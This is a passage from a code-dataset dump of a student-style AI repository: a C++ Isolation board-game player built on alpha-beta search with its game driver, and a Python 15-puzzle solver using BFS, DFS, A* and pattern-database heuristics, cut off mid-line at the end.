"license_type": "no_license",
"max_line_length": 87,
"num_lines": 389,
"path": "/isolation/src/nplayer.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <limits>\n#include <queue>\n#include <set>\n#include <stdio.h>\n#include <stdlib.h>\n\n#include \"types.h\"\n#include \"game.h\"\n#include \"table.h\"\n#include \"util.h\"\n#include \"nplayer.h\"\n\nusing namespace std;\n\nbool AggressivePlayer::IsIsolated(Board board, Position my, Position her)\n{\n\t// check the table first\n\t// int lookup = table_.isolated(board, my, her);\n\n\t// if (lookup == 1)\n\t// \treturn true;\n\t// else if (lookup == -1)\n\t// \treturn false;\n\t\n\t// BFS\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, my, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, my));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes)\n\t\t\treturn false;\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\t\t\t// we are reachable\n\t\t\tif (next == her) {\n\t\t\t\t//\t\t\t\ttable_.insert(board,my,her,false);\n\t\t\t\treturn false;\n\t\t\t}\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))\n\t\t\t\t&& visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t}\n\t\t}\n\t}\n\n\t//\ttable_.insert(board,my,her,true);\n\treturn true;\n}\n\n\n// return the maximum number of steps\n// conditioned on that we are isolated\n// this is deterministic\nint AggressivePlayer::MaxClosureDFS(Board board, Position cur, int depth, int maxdepth)\n{\n\t// make sure when we reach the cut off\n\t// we will have one more step than the cutoff\n\tif (depth > maxdepth)\n\t\treturn 0;\n\n\tint maxsteps = -1; // keep max steps I left\n\tfor (int d = 0; d < 8; d++) {\n\t\tPosition next = MakeMove(cur, Action((Direction)d, 1));\n\t\tBoard nboard;\n\t\tif ((nboard=TryMove(board, cur, (Direction)d, 1))) {\n\t\t\tint steps = MaxClosureDFS(nboard, next, depth+1, maxdepth);\n\t\t\tif (steps > maxsteps)\n\t\t\t\tmaxsteps = steps;\n\t\t}\n\t}\n\n\treturn 1 + maxsteps;\n}\n\n// return the maximum number of steps\n// conditioned on that we are isolated\n// this is deterministic\nint AggressivePlayer::MaxClosure(Board board, Position cur)\n{\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes) {\n\t\t\treturn maxsteps; // do not need to relax\n\t\t}\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn maxsteps;\n}\n\n\n\ndouble AggressivePlayer::Eval(Board board, Position my, Position her, int depth)\n{\n\tvector<Action> myactions = GenerateActions(board, my);\n\tvector<Action> heractions = GenerateActions(board, her);\n\n\t// she cannot move\n\t// we win!\n\tif (heractions.size() == 0)\n\t\treturn DMAX;\n\n\treturn 1.0 * myactions.size() / heractions.size();\n}\n\n\n\n// Estimate the likelihood that we are isolated\n// and she controls more squres than me\ndouble AggressivePlayer::Eval2(Board board, Position my, Position her)\n{\n\tif (IsIsolated(board, my, her)) {\n\t\tint hersteps = MaxClosureDFS(board, her, 0, kMaxDFSDepth);\n\t\tint mysteps = MaxClosureDFS(board, my, 0, kMaxDFSDepth);\n\t\tif (mysteps > hersteps)\n\t\t\treturn DMAX;\n\t\telse if (mysteps < hersteps)\n\t\t\treturn DMIN;\n\t}\n\treturn 0;\n}\n\nbool AggressivePlayer::Cutoff(Board board, Position my, Position her, int depth)\n{\n\tif (steps_ > kEndGameSteps)\n\t\treturn depth > kEndGameMaxDepth;\n\telse if (steps_ > kMidGameSteps)\n\t\treturn depth > kMidGameMaxDepth;\n\telse\n\t\treturn depth > kDefaultMaxDepth;\n}\n\n\nint AggressivePlayer::DoLocalMove(Board board, Position cur)\n{\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps) {\n\t\t\tmaxsteps = node.depth;\n\t\t\t\n\t\t\t// early termination\n\t\t\tif (maxsteps > hersteps_) \n\t\t\t\treturn maxsteps;\n\t\t}\n\n\t\tfrontier.pop();\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn maxsteps;\n}\n\n\n// Find the next best local move\nPosition AggressivePlayer::LocalMove(Board board, Position my)\n{\n\tPosition best = Position(-1,-1);\n\tint maxsteps = 0;\n\tfor (int d = 0; d < 8; d++) {\n\t\tPosition next = MakeMove(my, Action((Direction)d, 1));\n\t\tBoard nboard=TryMove(board, my, (Direction)d, 1);\n\t\tif (nboard) {\n\t\t\tint steps = DoLocalMove(nboard, next);\n\t\t\tif (steps >= maxsteps) {\n\t\t\t\tmaxsteps = steps;\n\t\t\t\tbest = next;\n\t\t\t\tif (steps > hersteps_) // we only need to do better than her\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\thersteps_--;\n\treturn best;\n}\n\n\n\nPosition AggressivePlayer::AlphaBeta(Board board, Position my, Position her)\n{\n\tdouble alpha = DMIN;\n\tdouble beta = DMAX;\n\n\tScoreAction sa = MaxValue(board, my, her, alpha, beta, 0);\n\n\tif (sa.action.steps == -1) {\n\t\t//\t\tcout << \"We will lose. But try our best.\" << endl;\n\t\treturn LocalMove(board, my);\n\t}\n\n\tif (TryMove(board, my, sa.action.dir, sa.action.steps)) {\n\t\treturn MakeMove(my, sa.action);\n\t}\n\telse {\n\t\treturn Position(-1, -1);\n\t}\n}\n\nScoreAction AggressivePlayer::MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// I lose\n\tif (IsDead(board, my))\n\t\treturn ScoreAction(DMIN, kInvalidAction);\n\n\t// She lose\n\tif (IsDead(board, her)) {\n\t\tvector<Action> actions = GenerateActions(board, my);\n\t\treturn ScoreAction(DMAX, actions[0]);\n\t}\n\n\n\tif (depth <= 4 && steps_ > kEagerGameSteps) {\n\t\tdouble score = Eval2(board, my, her);\n\t\tif (score < -1) { // it is the same as i will be killed\n\t\t\treturn ScoreAction(DMIN, kInvalidAction);\n\t\t}\n\t}\n\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, my, her, depth), kInvalidAction);\n\n\tAction maxaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, my);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(my, action);\n\n\t\tBoard nboard;\n\t\tdouble score = 0;\n\t\tif (!(nboard = TryMove(board, my, d, steps)))\n\t\t\tcontinue;\n\n\t\tscore = MinValue(nboard, npos, her, alpha, beta, depth+1).score;\n\n\t\tif (score > alpha) {\n\t\t\talpha = score;\n\t\t\tmaxaction = Action(d,steps);\n\t\t}\n\n\t\tif (alpha >= beta)\n\t\t\treturn ScoreAction(alpha, maxaction);\n\t}\n\n\treturn ScoreAction(alpha, maxaction);\n}\n\n\nScoreAction AggressivePlayer::MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// She lose\n\tif (IsDead(board, her))\n\t\treturn ScoreAction(DMAX, kInvalidAction);\n\n\t// I lose\n\tif (IsDead(board, my)) {\n\t\tvector<Action> actions = GenerateActions(board, her);\n\t\treturn ScoreAction(DMIN, actions[0]);\n\t}\n\n\t// THIS IS AGGRESSIVE MODE\n\n\tif (depth <= 3 && steps_ > kEagerGameSteps) {\n\t\tdouble score = Eval2(board, my, her);\n\t\tif (score > 1) { // avoid rounding error\n\t\t\treturn ScoreAction(DMAX, kInvalidAction);\n\t\t}\n\t}\n\t\n\t\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, her, my, depth), kInvalidAction);\n\n\tAction minaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, her);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(her, action);\n\n\t\tBoard nboard;\n\t\tdouble score = 0;\n\t\tif (!(nboard = TryMove(board, her, d, steps))) // she tries to move\n\t\t\tcontinue;\n\n\t\tif (score == 0)\n\t\t\tscore = MaxValue(nboard, my, npos, alpha, beta, depth+1).score;\n\n\t\tif (score < beta) {\n\t\t\tbeta = score;\n\t\t\tminaction = Action(d, steps);\n\t\t}\n\n\t\tif (beta <= alpha)\n\t\t\treturn ScoreAction(beta, minaction);\n\t}\n\n\treturn ScoreAction(beta, minaction);\n}\n\nPosition AggressivePlayer::Move(Board board, Position my, Position her)\n{\n\t// increase the steps as we move\n\tsteps_++;\n\n\tif (isolated_) // if isolated, do local move!\n\t\treturn LocalMove(board, my);\n\telse { // otherwise, adversial game!\n\t\t// check isolation\n\n\t\tbool test = IsIsolated(board, my, her);\n\t\tif (test) {\n\t\t\t//\t\t\tcout << \"Switching to local mode.\" << endl;\n\t\t\tisolated_ = true;\n\t\t\thersteps_ = MaxClosure(board, her);\n\t\t\treturn LocalMove(board, my);\n\t\t}\n\t\treturn AlphaBeta(board, my, her);\n\t}\n}\n\n"
},
{
"alpha_fraction": 0.5892018675804138,
"alphanum_fraction": 0.6049935817718506,
"avg_line_length": 18.772151947021484,
"blob_id": "be20e3f72387b28cbeac833d38cc7b12487b6e90",
"content_id": "85e5be9575dd417651049a3240d23c8c8ba8f3ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4686,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 237,
"path": "/isolation/src/game.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "//#define TEST\n\n#include <cassert>\n#include <cmath>\n#include <stdio.h>\n#include <stdlib.h>\n#include <queue>\n#include <set>\n#include <sstream>\n#include <iostream>\n\n#include \"game.h\"\n#include \"player.h\"\n#include \"nplayer.h\"\n#include \"dumb.h\"\n#include \"human.h\"\n#include \"util.h\"\n\nusing namespace std;\n\nGame::Game() {\n\tboard_ = kInvalidBoard;\n\tpositions_[0] = kFirstPos;\n\tpositions_[1] = kSecondPos;\n\tsetpos(board_, kFirstPos.row, kFirstPos.col);\n\tsetpos(board_, kSecondPos.row, kSecondPos.col);\n}\n\n\nGame::~Game()\n{\n\tfor (int player = 0; player < 1; player++) {\n\t\tif (players_[player] != NULL)\n\t\t\tdelete players_[player];\n\t\tplayers_[player] = NULL;\n\t}\n}\n\n\nbool IsDead(Board board, Position pos)\n{\n\treturn GenerateActions(board, pos).size() == 0;\n}\n\n\nbool ValidateMove(Board board, Position current, Position move)\n{\n\tif (move.row == -1 && move.col == -1) {\n\t\tcout << \"no way to go.\" << endl;\n\t\treturn false;\n\t}\n\n\t// check if moves out of the board\n\tif (move.row < 0 || move.col < 0 ||\n\t\tmove.row >= kBoardSize || move.col >= kBoardSize) {\n\t\tcout << \"moves out of the board.\" << endl;\n\t\treturn false;\n\t}\n\n\t// check if stay\n\tif (move == current) {\n\t\tcout << \"did not move.\" << endl;\n\t\treturn false;\n\t}\n\n\tint ro, co;\n\tunsigned int nsteps;\n\n\tif (current.row == move.row) { // horizontal move\n\t\tro = 0;\n\t\tco = current.col < move.col ? 1 : -1;\n\t\tnsteps = abs(current.col - move.col);\n\t}\n\telse if (current.col == move.col) { \t// vertical move\n\t\tro = current.row < move.row ? 1 : -1;\n\t\tco = 0;\n\t\tnsteps = abs(current.row - move.row);\n\t}\n\telse if (abs(current.row-move.row)==abs(current.col-move.col)) {\n\t\t// diagonal move\n\t\tro = current.row < move.row ? 1 : -1;\n\t\tco = current.col < move.col ? 1 : -1;\n\t\tnsteps = abs(current.row-move.row);\n\t}\n\telse {\n\t\tcout << \"move into a wrong direction.\" << endl;\n\t\treturn false;\n\t}\n\n\tfor (unsigned int step = 1; step <= nsteps; step++) {\n\t\tif (getpos(board, current.row + ro * step, current.col + co * step)) {\n\t\t\tcout << \"jumps over a occupied square\" << endl;\n\t\t\treturn false;\n\t\t}\n\t}\n\treturn true;\n}\n\nvector<Action> GenerateActions(Board board, Position cur)\n{\n\tvector<Action> actions;\n\tfor (int d = 0; d < 8; d++)\n\t\tfor (int steps = 1; steps < kBoardSize; steps++) \n\t\t\tif (TryMove(board, cur, (Direction)d, steps))\n\t\t\t\tactions.push_back(Action((Direction)d, steps));\n\t\t\telse\n\t\t\t\tbreak;\n\treturn actions;\n}\n\n\nvoid Game::ApplyMove(int mover, Position move)\n{\n\tsetpos(board_, move.row, move.col);\n\tpositions_[mover] = move;\n}\n\nvoid Game::Gameover(int mover)\n{\n\tcout << players_[mover]->name() << \" lose!\" << endl;\n}\n\nint Game::Play()\n{\n\tPrint();\n\n\tint mover = 0;\n\twhile (1) {\n\t\tPosition yourpos = positions_[mover];\n\t\tPosition herpos = positions_[1-mover];\n\t\tPosition move = players_[mover]->Move(board_, yourpos, herpos);\n\n\t\t// Validate\n\t\tif (!ValidateMove(board_,positions_[mover], move)) {\n\t\t\tGameover(mover);\n\t\t\tPrint();\n\t\t\treturn 1 - mover;\n\t\t}\n\n\t\t// update the board\n\t\tApplyMove(mover, move);\n\n\t\tcout << players_[mover]->name() << \" moves to (\" << move.row+1 << \",\" << move.col+1 << \")\" << endl;\n\n\t\tPrint();\n\n\t\t// flip the turn\n\t\tmover = 1 - mover;\n\t}\n}\n\n\nvoid Game::Print()\n{\n\tprint(board_, positions_[0], positions_[1]);\n}\n\nint main(int argc, char *argv[])\n{\n\tsrand(time(NULL));\n\n#ifndef TEST\n\tGame g;\n\tPlayer *player1;\n\tPlayer *player2;\n\t\n\tstring name1;\n\tstring name2;\n\tint fp = -1;\n\tstring yn;\n\tstring str;\n\n\tcout << \"Input player1 name: \";\n\tgetline(cin, name1);\n\tcout << name1 << \" joins the game.\" << endl;\n\n\tcout << \"Input player2 name: \";\n\tgetline(cin, name2);\n\tcout << name2 << \" joins the game.\" << endl;\n\n\tdo {\n\t\tcout << name1 << \" is robot? (Y/N)\";\n\t\tgetline(cin, yn);\n\t} while (yn[0] != 'Y' && yn[0] != 'N');\n\n\tif (yn[0] == 'Y')\n\t\tplayer1 = new AggressivePlayer(name1);\n\telse\n\t\tplayer1 = new HumanPlayer(name1);\n\n\tdo {\n\t\tcout << name2 << \" is robot? (Y/N)\";\n\t\tgetline(cin, yn);\n\t} while (yn[0] != 'Y' && yn[0] != 'N');\n\n\tif (yn[0] == 'Y')\n\t\tplayer2 = new AggressivePlayer(name2);\n\telse\n\t\tplayer2 = new HumanPlayer(name2);\n\n\tdo {\n\t\tcout << \"Who starts first? (1/2):\";\n\t\tgetline(cin, str);\n\t\tistringstream iss(str);\n\t\tiss >> fp >> std::ws;\n\t\tif (iss.fail() || !iss.eof())\n\t\t\tcout << \"Please input (1/2).\" << endl;\n\t\telse\n\t\t\tbreak;\n\t} while (1);\n\n\tif (fp == 1) {\n\t\tg.AddFirstPlayer(player1);\n\t\tg.AddSecondPlayer(player2);\n\t}\n\telse {\n\t\tg.AddFirstPlayer(player2);\n\t\tg.AddSecondPlayer(player1);\n\t}\n\tg.Play();\n#else\n\tint wins = 0;\n\tfor (int i = 0; i < 20; i++) {\n\t\tGame g;\n\t\tPlayer *dumb = new MyPlayer(\"dumb\");\n\t\tPlayer *aggressive = new AggressivePlayer(\"aggressive\");\n\t\tg.AddFirstPlayer(dumb);\n\t\tg.AddSecondPlayer(aggressive);\n\t\tint winner = g.Play();\n\t\twins += winner;\n\n\t\tcout << wins << \"/\" << i+1 << endl;\n\n\t}\n\tcout << wins << endl;\n#endif\n}\n"
},
{
"alpha_fraction": 0.5100393295288086,
"alphanum_fraction": 0.5337059497833252,
"avg_line_length": 28.447154998779297,
"blob_id": "3e0f331b209b4a08e9b5d0989da58429562ebe0e",
"content_id": "91186c64d1f80eb1b421aa8ed04e5d9640f43600",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14493,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 492,
"path": "/puzzle/puzzle.py",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "\"\"\"\n15 Puzzles\n\n\"\"\"\n\nimport sys\nimport string\nimport heapq\nimport itertools\nfrom random import randint\nfrom random import shuffle\nfrom collections import deque\n\n#------------------------------------------------\n# Board settings\n\ndirections = ['N','S','W','E']\nmaxnodes = 50000\nmaxdepth = 20\nmaxtraindep = 18\n\nN = 15\nboard_size = 4\n\nloops = list(itertools.product(range(board_size), range(board_size)))\n\n#------------------------------------------------\n# Class definitions\n\nclass Solution:\n def __init__(self, algo, steps, stats):\n self.algo = algo\n self.steps = steps\n self.stats = stats\n\n def __str__(self):\n outs = self.algo + \":\\n\"\n outs += \"(\"\n outs += \"(\"\n if self.steps: \n outs += (\"(\" + string.join(self.steps, \" \") + \") \")\n outs += str(len(self.steps))\n else:\n outs += \"NIL NIL\"\n outs += \") \"\n outs += string.join(map(str, self.stats), \" \")\n outs += \")\"\n return outs\n\nclass State:\n offsets = { \"N\": (-1, 0),\n \"S\": ( 1, 0),\n \"W\": ( 0, -1),\n \"E\": ( 0, 1)}\n\n def at(self,r,c):\n return (self.coding>>((r*4+c)*4)) & N\n\n def set(self, r, c, v):\n self.coding |= (v<<((r*4+c)*4))\n\n def clear(self,r,c):\n self.coding &= ~(N<<((r*4+c)*4))\n\n # return the coding with all tiles not in the pattern masked\n def mask(self, pattern):\n masked = self.coding\n for r,c in loops:\n if self.at(r,c) not in pattern:\n masked &= ~(N<<((r*4+c)*4))\n return masked\n \n def __init__(self, coding, blank, parent=None, action=None, cost=0):\n self.coding = coding\n self.blank = blank\n self.parent = parent\n self.action = action\n self.cost = cost\n \n def swap(self, row, col, ro, co):\n self.blank = (row+ro,col+co)\n self.set(row,col,self.at(row+ro,col+co))\n self.clear(row+ro,col+co)\n\n def move(self, direction, cost=1):\n row, col = self.blank\n ro, co = State.offsets[direction]\n if row+ro >= 0 and row+ro < board_size and col+co >= 0 and col+co < board_size: \n child = State(self.coding,self.blank,self,direction,self.cost+cost)\n child.swap(row,col,ro,co)\n return child\n else:\n return None \n\n def trace(self):\n steps = []\n node = self\n while node.parent:\n steps.append(node.action)\n node = node.parent\n return steps\n \n def win(self, goal): \n return self.coding == goal.coding\n\n def __hash__(self):\n return hash(self.coding) # hash(blank), depends on which one is faster\n \n def __eq__(self, other):\n return self.blank==other.blank and self.coding==other.coding\n \n def __str__(self):\n string = \"-------------------\\n\"\n for r in range(board_size):\n for c in range(board_size):\n string += (\"%4d\" % self.at(r, c))\n string += \"\\n\"\n string += \"-------------------\\n\"\n return string\n\n#------------------------\n# puzzle generator\n\ndef generate_random():\n x = range(0,N+1)\n shuffle(x)\n \n pos = x.index(0)\n row = pos / board_size\n col = pos % board_size\n\n game = State(0L,(row,col))\n for n, i in zip(x, range(N+1)):\n r = i / board_size\n c = i - r * board_size\n game.set(r,c,n)\n game.blank = (row,col)\n return game\n\ndef generate(goal, nsteps):\n def random_dir():\n return directions[randint(0, len(directions)-1)]\n\n current = goal\n visited = set()\n visited.add(goal.coding)\n step = 0\n while step < nsteps:\n d = random_dir()\n next = current.move(d)\n if next and next.coding not in visited:\n visited.add(next.coding)\n current = next\n step += 1\n current.parent = current.action = None\n current.cost = 0\n return current\n\n#------------------------\n# dfs\n\ndef do_dfs(start, goal, maxd):\n total = repeats = 0\n visited = set()\n frontier = [] # use list to simulate the stack\n frontier.append(start)\n visited.add(start.coding)\n\n while frontier:\n current = frontier.pop()\n if current.win(goal):\n return (current.trace(), (total, repeats, len(frontier), 0))\n \n if current.cost >= maxd: continue\n\n for direction in directions:\n child = current.move(direction)\n if not child: continue\n\n total += 1\n frontier.append(child)\n if child.coding not in visited:\n visited.add(child.coding)\n else:\n repeats += 1\n return (None, (total, repeats, len(frontier), 0))\n\n# TODO: statistics not counted\ndef dfs_recursive(node, goal, depth):\n if node.win(goal):\n return (node.trace(), (0,0,0,0))\n elif depth == 0: return (None,(0,0,0,0))\n\n for direction in directions:\n child = node.move(direction)\n if not child: continue\n result = dfs_recursive(child, goal, depth-1) \n if result[0]:\n return result\n return (None, (0,0,0,0))\n \ndef dfs(start, goal):\n '''DFS'''\n return do_dfs(start, goal, maxdepth)\n\ndef idfs(start, goal):\n '''IDFS'''\n def update_stats(stats, ns):\n return (stats[0]+ns[0], stats[1]+ns[1], ns[2], ns[3])\n \n depth = 0\n stats = (0,0,0,0)\n for depth in range(maxdepth):\n solution = do_dfs(start, goal, depth)\n stats = update_stats(stats, solution[1])\n if solution[0]:\n return (solution[0], stats)\n return (None, stats)\n\n#------------------------\n \ndef bfs(start, goal):\n '''BFS'''\n total = repeats = 0\n frontier = deque() # FIFO queue\n visited = set()\n visited.add(start.coding)\n frontier.append(start)\n \n while frontier:\n current = frontier.popleft()\n\n if current.win(goal):\n return (current.trace(), (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n \n for direction in directions:\n child = current.move(direction)\n if not child: continue\n\n total += 1\n if child.coding not in visited:\n frontier.append(child)\n visited.add(child.coding)\n else:\n repeats += 1\n return (None, (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n\n\n#------------------------\n# Be careful about the stability issue in heapq\n \ndef search(start, goal, costfun, hfun):\n total = repeats = 0 \n frontier = []\n visited = set()\n heapq.heappush(frontier, (hfun(start,goal), start))\n visited.add(start.coding)\n\n while frontier:\n f, current = heapq.heappop(frontier)\n if current.win(goal):\n return (current.trace(), (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n\n if total > maxnodes: break\n \n for direction in directions:\n child = current.move(direction, costfun(direction))\n if child is None: continue\n\n fvalue = child.cost + hfun(child, goal) \n total += 1\n if child.coding not in visited:\n heapq.heappush(frontier, (fvalue, child))\n visited.add(child.coding)\n else:\n repeats += 1 \n # Ugly update\n index = [idx for idx in range(len(frontier)) if frontier[idx][1]==child]\n if len(index) == 1 and frontier[index[0]][0] > fvalue:\n frontier[index[0]] = (fvalue, child)\n heapq.heapify(frontier)\n \n return (None, (total, repeats, len(frontier), len(visited)-len(frontier)-1))\n \n\ndef h_none(state1, state2):\n return 0\n\ndef uniform_cost(action):\n return 1\n\ndef zero_cost(action):\n return 0\n \ndef h_manhattan(state1, state2):\n pos1 = [0] * 16\n pos2 = [0] * 16 \n \n for r,c in loops:\n pos1[state1.at(r,c)] = (r,c)\n pos2[state2.at(r,c)] = (r,c)\n\n pos1[0] = pos2[0] = (0,0)\n dist = sum([abs(x[0]-y[0])+abs(x[1]-y[1]) for x,y in zip(pos1, pos2)])\n return dist\n\nclass PatternDB:\n def __init__(self, pattern):\n self.pattern = pattern\n self.cache = {}\n\n def search(self, state):\n code = state.mask(self.pattern)\n return self.cache.get(code, 0)\n\n def add(self, state, steps):\n code = state.mask(self.pattern)\n if code not in self.cache:\n self.cache[code] = steps\n\n \npatterns = [[1,2,3,4,5,6,7,8],[9,10,11,12,13,14,15]] \n#patterns = [[x] for x in range(1,16)] # train manhattan\n\nclass PatternState(State):\n def __init__(self, coding, blank, steps=0, parent=None, action=None, cost=0):\n self.steps = steps\n State.__init__(self,coding, blank, parent, action, cost) \n \n def move(self, direction, cost=1):\n row, col = self.blank\n ro, co = State.offsets[direction]\n \n if row+ro >= 0 and row+ro < board_size and col+co >= 0 and col+co < board_size: \n child = PatternState(self.coding,self.blank,self.steps,self,direction,self.cost+cost)\n child.swap(row,col,ro,co)\n v = child.at(row,col)\n if v != 0: child.steps += 1\n return child\n else:\n return None \n\n \ndef train_pattern(goal, pattern):\n db = PatternDB(pattern)\n goal = PatternState(goal.coding, goal.blank)\n goal.coding = goal.mask(pattern)\n frontier = deque() # FIFO queue\n visited = set()\n visited.add((goal.coding, goal.blank))\n frontier.append(goal)\n \n while frontier:\n current = frontier.popleft()\n db.add(current, current.steps) \n \n if current.cost > maxtraindep: break\n \n for direction in directions:\n child = current.move(direction)\n if not child: continue\n\n if (child.coding,child.blank) not in visited:\n frontier.append(child)\n visited.add((child.coding, child.blank))\n return db\n \npdbs = [] \ndef train(goal):\n for pattern in patterns:\n pdbs.append(train_pattern(goal, pattern))\n \ndef h_patterndb(state, goal):\n h = sum([pdb.search(state) for pdb in pdbs])\n return max(h, h_manhattan(state,goal))\n \ndef h_linear_conflict(s, goal):\n # return a priority queue\n # key: num of conflict\n # value: (tile id, <list-of-conflict-ids>)\n def nconflict(values, goal):\n both = set(values).intersection(set(goal))\n if 0 in both:\n both.remove(0)\n q = []\n for v in both:\n conflicts = []\n for v2 in both:\n if v==v2: continue\n if (values.index(v)<values.index(v2) and goal.index(v)>goal.index(v2)) or (values.index(v)>values.index(v2) and goal.index(v)<goal.index(v2)):\n conflicts.append(v2)\n if len(conflicts) > 0:\n heapq.heappush(q, (-len(conflicts), (v, conflicts)))\n return q\n \n\n def ith(state, axis, i):\n ilist = []\n for j in range(4):\n v = state.at(i,j) if axis==\"row\" else state.at(j,i)\n ilist.append(v)\n return ilist\n\n lcs = []\n for axis, i in itertools.product([\"row\",\"col\"],range(4)):\n lci = 0\n conflicts = nconflict(ith(s,axis,i), ith(goal,axis,i))\n while conflicts: # conflicts is priority queue\n nc,(v,cfs) = heapq.heappop(conflicts)\n for idx in range(len(conflicts)):\n nc2,(v2,cfs2) = conflicts[idx]\n if v in cfs2:\n cfs2.remove(v)\n conflicts[idx] = (-len(cfs2), (v2, cfs2))\n heapq.heapify(conflicts)\n lci += 1\n lcs.append(lci)\n return 2*sum(lcs) + h_manhattan(s, goal)\n\ndef uniform(start, goal):\n '''Uniform'''\n return search(start, goal, uniform_cost, h_none)\n \ndef astar_pattern(start, goal):\n '''A* - Pattern DBs'''\n return search(start, goal, uniform_cost, h_patterndb)\n \ndef greedy_lc(start, goal):\n '''Greedy - Manhattan + Linear conflicts'''\n return search(start, goal, zero_cost, h_linear_conflict)\n\ndef astar_lc(start, goal):\n '''A* - Manhattan + Linear conflicts'''\n return search(start, goal, uniform_cost, h_linear_conflict)\n\ndef astar(start, goal):\n '''A* - Manhattan'''\n return search(start, goal, uniform_cost, h_manhattan)\n\ndef greedy(puzzle, goal):\n '''Greedy - Manhattan'''\n return search(puzzle, goal, zero_cost, h_manhattan)\n\ndef solve(puzzle, goal, algo):\n solution = algo(puzzle, goal)\n return Solution(algo.__doc__, solution[0], solution[1])\n\nhard = \"((1 5 3 7) (4 9 2 11) (8 13 10 14) (12 15 0 6) (3 2))\"\nhard2 = \"( (1 2 3 7) (4 5 6 15) (8 9 11 0) (12 13 14 10) (2 3) )\"\neasy = \"((1 2 3 0) (4 5 6 7) (8 9 10 11) (12 13 14 15) (0 3))\"\nmoderate = \"((1 2 6 3) (4 5 10 7) (0 9 14 11) (8 12 13 15) (2 0))\"\ngoal1 = \"((0 1 2 3) (4 5 6 7) (8 9 10 11) (12 13 14 15) (0 0))\"\ngoal2 = \"((1 2 3 4) (8 7 6 5) (9 10 11 12) (0 15 14 13) (3 0))\"\n\nimport re\ndef parse_state(statestr):\n statestr.strip('\"\\'')\n statestr = statestr[1:-1] # remove parenthesis\n rowsstr = re.findall('\\(.*?\\)', statestr) \n blank = tuple(map(int, rowsstr[-1][1:-1].split(' ')))\n rows = [map(int, row[1:-1].split(' ')) for row in rowsstr[0:-1]]\n\n state = State(0L,blank)\n for r,c in loops:\n state.set(r,c,rows[r][c])\n return state\n\nimport time\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print \"Usage: python puzzle.py <start-state> <goal-state>\"\n sys.exit(1)\n start = parse_state(sys.argv[1])\n goal = 